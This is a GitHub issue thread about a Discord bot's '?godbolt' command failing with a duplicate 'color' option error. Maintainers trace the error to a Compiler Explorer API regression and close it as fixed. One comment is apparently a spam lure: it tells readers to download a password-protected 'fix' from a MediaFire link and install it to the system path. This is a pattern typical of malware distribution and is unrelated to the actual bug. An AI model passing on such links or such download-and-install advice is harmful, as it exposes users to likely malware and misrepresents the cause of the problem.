### ISSUE TITLE
`?godbolt` error giving `error: Option 'color' given more than once`

### ISSUE THREAD

**Issue by harudagondi** [rust-community-discord/ferrisbot-for-discord#34]
Do:

?godbolt 
```rust
#[no_mangle]
pub fn foo() {}
```

Ferris returns:

```rust
error: Option 'color' given more than once

<Compilation failed>
```
Note: only public functions (`pub fn`) are shown

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by theMackabu** [comment]
Seems to be a regression in the godbolt api https://github.com/compiler-explorer/compiler-explorer/issues/2420

**Comment by GnomedDev** [comment]
I'm looking into fixing this

**Comment by GnomedDev** [comment]
This was fixed by #35 btw.
